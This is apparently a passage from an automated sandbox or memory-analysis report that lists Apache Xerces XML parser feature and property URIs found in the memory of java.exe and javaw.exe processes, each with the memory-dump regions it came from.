Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs3
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refs7
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-builtin-refsnterna7
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs/3
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/scanner/notify-char-refs3
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant#
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformant#E
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/standard-uri-conformantom2
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotations;
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationsTextI;
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validate-annotationss7
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-trees
Source: java.exe, 00000007.00000002.2847662929.000000001516B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731688566.0000000015164000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.0000000015142000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesl
Source: javaw.exe, 00000006.00000003.1724377544.0000000015BC0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2850756456.0000000015BBF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/balance-syntax-treesre1
Source: javaw.exe, 00000006.00000003.1724377544.0000000015BC0000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2850756456.0000000015BBF000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001516B000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731688566.0000000015164000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.0000000015142000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/dynamic
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checking/sun/F
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/id-idref-checkingF
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checking
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkingS:
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/identity-constraint-checkinges
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking#
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checking=
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema-full-checkingin=
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psvi3
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/augment-psviint
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-default
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/element-defaultO
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdecl/A
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclA
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/ignore-xsi-type-until-elemdeclc
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-value
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valueB
Source: javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schema/normalized-valuenternalB
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/schemacA
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checking
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingB
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/unparsed-entity-checkingn/org/B
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef/xni/XD
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef3
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdef3:
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-duplicate-attdefD
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdef:
Source: java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefS
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/validation/warn-on-undeclared-elemdefm/su:
Source: java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydef/xerce
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/warn-on-duplicate-entitydefsA
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1731447511.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2847662929.000000001518C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-base-uris6
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language39
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude/fixup-language;
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/features/xinclude1
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/D
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/current-element-node9
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name
Source: javaw.exe, 00000006.00000002.2850756456.0000000015B08000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-name$
Source: java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/dom/document-class-namesL
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-size
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/input-buffer-sizejava/l
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factory:
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/datatype-validator-factoryes/i:
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scanner7
Source: javaw.exe, 00000006.00000002.2850756456.0000000015C69000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724377544.0000000015C77000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1724943060.0000000015CA9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/document-scannerypeDef7
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2843677825.0000000009E28000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004AFA000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2840004492.0000000004839000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor
Source: java.exe, 00000007.00000002.2848131978.0000000015299000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1730938795.0000000015282000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://apache.org/xml/properties/internal/dtd-processor5
